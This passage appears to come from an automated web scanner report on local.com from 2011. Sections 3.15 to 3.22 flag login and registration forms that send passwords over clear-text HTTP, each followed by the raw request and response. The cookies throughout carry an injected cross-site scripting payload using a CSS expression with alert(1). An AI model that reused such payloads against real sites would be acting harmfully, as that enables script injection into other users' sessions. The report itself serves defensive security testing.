Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.15. http://www.local.com/coupons/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Coupons in Dallas, TX | Local
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.16. http://www.local.com/coupons/printable/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/printable/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /coupons/printable/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 25463
Date: Thu, 03 Feb 2011 16:45:55 GMT
Content-Length: 25463
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:45:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Not Found - Local.com</title>
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.17. http://www.local.com/dialogs/register.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /dialogs/register.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /dialogs/register.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27119
Date: Thu, 03 Feb 2011 16:55:56 GMT
Content-Length: 27119
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>www.local.com-Register</title
...[SNIP]...
<!-- END typeAhead items -->


<form name="aspnetForm" method="post" action="/dialogs/register.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password" type="password" id="defaultPageTemplate_password" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$password2" type="password" id="defaultPageTemplate_password2" class="createActInput" />
                   </div>
...[SNIP]...
</label>
                       <input name="defaultPageTemplate$haveActPassword" type="password" id="defaultPageTemplate_haveActPassword" class="haveActInput" />
                       <p class="pTB10">
...[SNIP]...

3.18. http://www.local.com/events/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 86267
Date: Thu, 03 Feb 2011 16:43:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 86267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Local Events | Find co
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.19. http://www.local.com/events/category/music/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/music/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/music/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 92872
Date: Thu, 03 Feb 2011 16:44:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 92872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Concerts Events | Find
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.20. http://www.local.com/events/category/performing-arts/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/performing-arts/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/performing-arts/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 87986
Date: Thu, 03 Feb 2011 16:44:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 87986

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Theatre and Comedy Eve
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.21. http://www.local.com/events/category/sports/dallas-tx.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /events/category/sports/dallas-tx.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events/category/sports/dallas-tx.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 90349
Date: Thu, 03 Feb 2011 16:44:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 90349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas Sports Events | Find S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

3.22. http://www.local.com/faq.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /faq.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /faq.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28952
Date: Thu, 03 Feb 2011 16:53:12 GMT
Content-Length: 28952
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
